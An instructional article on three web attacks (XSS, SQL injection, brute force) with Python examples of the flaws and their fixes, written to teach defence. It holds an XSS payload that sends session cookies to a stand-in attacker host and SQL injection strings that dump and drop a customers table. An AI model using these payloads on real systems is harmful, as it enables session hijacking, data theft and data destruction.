You have probably heard of penetration testing. A penetration test is an authorized, simulated attack on your software that aims to find the security flaws a real attacker would exploit. It is most often associated with web applications, but it covers every layer of a system, from the network and operating system up to the application itself. You can perform some of it yourself, and automated scanners make the basic checks easier for a beginner, though they only find the well-known patterns. Here are three basic attacks you can test for yourself, or at least be aware of, before you launch your application.
1. Cross-Site Scripting or XSS
First, let's cover XSS and query strings. A query string is the set of key-value pairs that follows the "?" in a URL. Consider a URL whose query string carries a "customer" key with the value "Joe."
A naive application takes the "Joe" value and writes it directly into the HTML of the page. What happens if "Joe" is replaced with a script tag instead of a name? The browser cannot tell the difference between markup the developer wrote and markup that arrived in the query string, so it runs the script. This is reflected XSS: the payload rides in the link, and the attacker only has to get a victim to open it.
Query string values aren't the only way to use XSS. The attacker can also submit a script through a form so that it is saved in your database and later rendered into an internal employee's browser. This is stored XSS. The mechanism is the same, but the payoff is much larger, because the script now runs in a trusted employee's session rather than in a random visitor's. Suppose the attacker plants a script in a customer record and a customer service rep opens the application to review that record. The rep is logged in, so her browser holds session cookies that identify her authenticated session. The injected script can read those cookies and send them to the attacker, who can then replay them and gain unauthorized access to your internal applications. The fix is the same in both cases: encode every untrusted value for the context it is written into (HTML entity encoding for page content) so the browser treats it as text, and mark session cookies HttpOnly so a script cannot read them even if one does get through.
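Both cases above, as an added Python example that is not from the original article: a greeting page that reflects the "customer" query-string value, and a record store whose contents are later rendered to an employee. The payload, the hostname in it, the page markup and the list standing in for the database are all assumptions made for illustration.

```python
import html

# Constructed payload for illustration: what an attacker might put in place of
# "Joe" in the customer query-string value. Hypothetical host, not a real one.
XSS_PAYLOAD = ('<script>new Image().src="http://attacker.example/c?"'
               '+encodeURIComponent(document.cookie)</script>')


def render_greeting_vulnerable(customer):
    """Reflected XSS: the query-string value is concatenated straight into HTML."""
    return "<h1>Welcome, " + customer + "</h1>"


def render_greeting_safe(customer):
    """Same page, but the value is HTML-entity encoded before it reaches the browser."""
    return "<h1>Welcome, " + html.escape(customer, quote=True) + "</h1>"


def save_record(store, name, note):
    """Stored XSS, stage 1: attacker input is persisted unchanged (a list stands in for the database)."""
    store.append({"name": name, "note": note})


def render_records(store, escape_output=True):
    """Stored XSS, stage 2: an internal page later renders every record to an employee's browser."""
    rows = []
    for rec in store:
        name = html.escape(rec["name"]) if escape_output else rec["name"]
        note = html.escape(rec["note"]) if escape_output else rec["note"]
        rows.append("<tr><td>" + name + "</td><td>" + note + "</td></tr>")
    return "<table>" + "".join(rows) + "</table>"


def contains_live_script(page):
    """Crude check used below: is there still a raw <script> tag the browser would execute?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_greeting_vulnerable(XSS_PAYLOAD))   # script tag intact: the browser runs it
    print(render_greeting_safe(XSS_PAYLOAD))         # &lt;script&gt;...: displayed as text
    db = []
    save_record(db, "Joe", XSS_PAYLOAD)              # attacker-supplied note saved verbatim
    print(render_records(db, escape_output=False))   # the employee's browser runs it
    print(render_records(db, escape_output=True))    # escaped on output: inert
```

Escaping happens at output time, not at input time, because the same stored value may be written into HTML, JavaScript, or a URL, and each context needs its own encoding. Input filtering that strips the word "script" is easily bypassed; entity encoding at the point of rendering is not.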
2. SQL Injection
SQL injection is an attack that tricks your application into running attacker-supplied SQL against its database. It works against any SQL database. MySQL, Oracle and Microsoft SQL Server differ slightly in syntax (comment markers, string functions, whether several statements can be sent in one call), so an attacker adapts the payload to the engine behind the application, but the underlying flaw is identical everywhere: user input concatenated into a SQL statement. Many payloads need no adaptation at all and work on every engine.
SQL injection can arrive through query strings, form fields, cookies or HTTP headers; anything the application copies into a dynamically built SQL statement is a way in. The most important character is the single quote, or tick mark, because it delimits strings in SQL. Look at the following SQL statement:
select * from customers where name='joe';
Notice that the string value "joe" is enclosed in tick marks. The opening tick mark marks the start of the string and the second one terminates it. The semicolon tells the SQL engine that the statement is finished, and you can put more than one statement on the same line as long as each is terminated with a semicolon. Now look at what the same statement becomes after an injection.
select * from customers where name='' or 1=1; drop table customers; -- '
The text "' or 1=1; drop table customers; --" is what the attacker submits in the query string or form field. The first tick mark closes the string early, so the WHERE clause becomes name='' or 1=1, a condition that is true for every row, and the SELECT returns the entire customers table. The semicolon ends that statement, and the attacker's DROP TABLE runs next. The trailing "--" turns the rest of the line, including your original closing tick mark, into a comment, so the database sees no syntax error. The result is that all of your customer data is handed to the attacker and then the table is deleted. Note that the second half of this attack depends on the database driver accepting more than one statement in a single call (stacked queries); many drivers refuse, but the first half, reading every row, works regardless.
SQL injection is the most widely exploited of the three attacks because nearly every web application talks to a SQL database, and it turns up constantly in WordPress plugins and other add-ons that build SQL inline from request data. The reliable defense is parameterized queries (prepared statements), which send the user's value to the database separately from the SQL text so it can never be parsed as code. Stored procedures help only if they do not build dynamic SQL themselves, and scrubbing tick marks out of input is not a fix: a number used in a WHERE clause needs no quotes at all, so an attacker can inject without one. Cleaning up after this attack can be tedious, so make sure no path in your code lets user input reach the database as SQL.
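The injection above and the fix for it, as an added Python example that is not from the original article. It uses Python's built-in sqlite3 module against an in-memory table with constructed sample rows; the table contents, the function names and the payload strings are assumptions. It also shows why removing tick marks alone is not enough, and what happens to the stacked DROP TABLE when the driver only accepts one statement per call.

```python
import sqlite3


def make_db():
    """Constructed sample data, not from the article: an in-memory customers table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table customers (id integer primary key, name text, email text)")
    conn.executemany(
        "insert into customers (name, email) values (?, ?)",
        [("joe", "joe@example.com"), ("ann", "ann@example.com"), ("bob", "bob@example.com")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn, name):
    """Dynamic SQL by string concatenation: the injectable pattern from the article."""
    sql = "select name from customers where name='" + name + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, name):
    """The value is bound as a parameter; the SQL text itself never changes."""
    return [row[0] for row in conn.execute("select name from customers where name=?", (name,))]


def lookup_by_id_quotes_stripped(conn, raw_id):
    """Why stripping tick marks is not a fix: a numeric context needs no quote at all."""
    cleaned = raw_id.replace("'", "")
    return [row[0] for row in conn.execute("select name from customers where id=" + cleaned)]


def lookup_by_id_validated(conn, raw_id):
    """Validate the type, then bind it; non-numeric input is rejected outright."""
    customer_id = int(raw_id)  # raises ValueError for input like "1 or 1=1"
    return [row[0] for row in conn.execute("select name from customers where id=?", (customer_id,))]


def stacked_query_attempt(conn, name):
    """The DROP TABLE half of the attack needs stacked statements. Python's sqlite3 refuses
    a second statement in execute(); executescript() and many other drivers do not, so
    this is a driver quirk, not a defense. Returns what happened as a string."""
    sql = "select name from customers where name='" + name + "'"
    try:
        conn.execute(sql)
        return "executed"
    except (sqlite3.ProgrammingError, sqlite3.Warning) as exc:  # older Pythons raise Warning
        return "rejected: " + str(exc)


if __name__ == "__main__":
    conn = make_db()
    print(lookup_vulnerable(conn, "joe"))                    # ['joe']
    print(lookup_vulnerable(conn, "' or 1=1 --"))            # every customer
    print(lookup_parameterized(conn, "' or 1=1 --"))         # []: nobody has that name
    print(lookup_by_id_quotes_stripped(conn, "1 or 1=1"))    # every customer, no quote needed
    print(stacked_query_attempt(conn, "' or 1=1; drop table customers; --"))
```

The parameterized version is not "cleaning" the input; the input is simply never parsed as SQL, which is why it holds up against payloads the tick-mark filter never anticipated.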
3. Brute Force Attacks
Brute force is a method of guessing a user's password. A pure brute force attack tries every possible combination; a dictionary attack, the far more common variant, tries lists of common passwords and words, often with simple variations, until one is accepted. These attacks are probably the easiest to defend against, but attackers usually aim them at exposed services on ports you might not be monitoring rather than at your login page.
For instance, Remote Desktop Protocol (RDP) is a common protocol that listens by default on TCP port 3389. RDP lets you control a server's desktop remotely and is built into Microsoft Windows as a standard management tool. An attacker runs brute force software that tries password after password against your RDP login. If you run a small business or a personal site, you are probably not watching that port, so the script can keep sending guesses until one works. Once the attacker has a remote desktop session, he can change the configuration, install software, or read anything on disk.
Brute force attacks are the noisiest of the three, since every guess leaves a failed-login entry, but they are only as visible as your logging; if nobody reads the logs, the attack goes unnoticed in practice. The best defense is to lock the account or throttle the source after a set number of failed attempts, and to require a second factor so that a guessed password alone is not enough. Keep in mind that an aggressive lockout lets an attacker lock out your legitimate users on purpose, so prefer temporary lockouts or rate limiting over permanent ones. A second, weaker measure is to run common services on an alternative port. Instead of leaving RDP on 3389, choose an uncommon port, or better, keep it off the public internet entirely. Opportunistic attackers play a quantity game: their scripts scan for the default port and will usually skip your server and move on to one that answers on 3389. This is no protection against someone targeting you specifically, since a port scan finds the service in minutes, but it does cut down the automated noise.
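The two controls above, as an added Python example that is not from the original article: a detector that counts failed logins per source address and account over a sliding time window, run over constructed authentication log lines in an assumed key-value format, and a lockout that refuses further attempts, even with the correct password, once the threshold is hit. The log format, thresholds, timestamps and addresses are all assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log lines in a hypothetical format (not from the article).
# 203.0.113.5 hammers "admin"; alice mistypes twice then logs in; 192.0.2.9
# spreads its guesses against "bob" three minutes apart.
SAMPLE_LOG = """\
2024-03-01T10:00:01 src=203.0.113.5 user=admin result=FAIL
2024-03-01T10:00:02 src=203.0.113.5 user=admin result=FAIL
2024-03-01T10:00:03 src=203.0.113.5 user=admin result=FAIL
2024-03-01T10:00:04 src=203.0.113.5 user=admin result=FAIL
2024-03-01T10:00:05 src=203.0.113.5 user=admin result=FAIL
2024-03-01T10:00:06 src=203.0.113.5 user=admin result=FAIL
2024-03-01T10:00:07 src=198.51.100.7 user=alice result=FAIL
2024-03-01T10:00:09 src=198.51.100.7 user=alice result=FAIL
2024-03-01T10:00:12 src=198.51.100.7 user=alice result=OK
2024-03-01T10:00:30 src=192.0.2.9 user=bob result=FAIL
2024-03-01T10:03:30 src=192.0.2.9 user=bob result=FAIL
2024-03-01T10:06:30 src=192.0.2.9 user=bob result=FAIL
2024-03-01T10:09:30 src=192.0.2.9 user=bob result=FAIL
2024-03-01T10:12:30 src=192.0.2.9 user=bob result=FAIL
"""


def parse_line(line):
    """Split one log line into (timestamp, source address, user, result)."""
    ts_text, *fields = line.split()
    kv = dict(field.split("=", 1) for field in fields)
    return datetime.fromisoformat(ts_text), kv["src"], kv["user"], kv["result"]


def detect_bruteforce(log_text, threshold=5, window=timedelta(minutes=1), by_user=True):
    """Sliding-window count of failures per (src, user), or per src alone when
    by_user is False (catches password spraying across many accounts).
    Returns {key: timestamp at which the threshold was first crossed}."""
    recent = defaultdict(deque)
    flagged = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, user, result = parse_line(line)
        if result != "FAIL":
            continue
        key = (src, user) if by_user else (src, "*")
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] > window:   # drop failures older than the window
            q.popleft()
        if len(q) >= threshold and key not in flagged:
            flagged[key] = ts
    return flagged


class AccountLockout:
    """Lock an account after max_failures consecutive failures; a correct password
    is refused while the lock is active, and a success after expiry resets the count."""

    def __init__(self, max_failures=5, lock_for=timedelta(minutes=15)):
        self.max_failures = max_failures
        self.lock_for = lock_for
        self.failures = defaultdict(int)
        self.locked_until = {}

    def attempt(self, user, password_ok, now):
        until = self.locked_until.get(user)
        if until is not None and now < until:
            return "locked"                      # refuse even a correct password
        if password_ok:
            self.failures[user] = 0
            self.locked_until.pop(user, None)
            return "ok"
        self.failures[user] += 1
        if self.failures[user] >= self.max_failures:
            self.locked_until[user] = now + self.lock_for
            self.failures[user] = 0
            return "locked"
        return "fail"


def demo_lockout():
    """Constructed scenario: three wrong guesses lock 'admin' for 15 minutes."""
    guard = AccountLockout(max_failures=3, lock_for=timedelta(minutes=15))
    t0 = datetime(2024, 3, 1, 12, 0, 0)
    script = [
        (timedelta(seconds=0), False),
        (timedelta(seconds=1), False),
        (timedelta(seconds=2), False),   # third failure: the account locks
        (timedelta(seconds=3), True),    # correct password, still refused
        (timedelta(minutes=16), True),   # lock expired: success, counter reset
    ]
    return [guard.attempt("admin", ok, t0 + dt) for dt, ok in script]


if __name__ == "__main__":
    for key, when in detect_bruteforce(SAMPLE_LOG).items():
        print("brute force from %s against %s at %s" % (key[0], key[1], when.isoformat()))
    print(demo_lockout())
```

Two things are worth noticing when you run it. The slow attacker against "bob" never trips a one-minute window, which is exactly the pattern real tools use to stay under lockout thresholds; a longer window or a per-day failure count is needed to catch it. And the lockout is deliberately temporary: a permanent lock after five failures hands any attacker a one-line denial of service against your users, so expire it and rate-limit the source address as well.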
These three common attacks should be a priority when you penetration test. They are the most common, but you should also check for any other flaws in your website's security. Most webmasters treat security as an afterthought and assume they will never be targeted, yet when an attacker gets hold of your private data, the damage to your company's integrity and reputation can be devastating.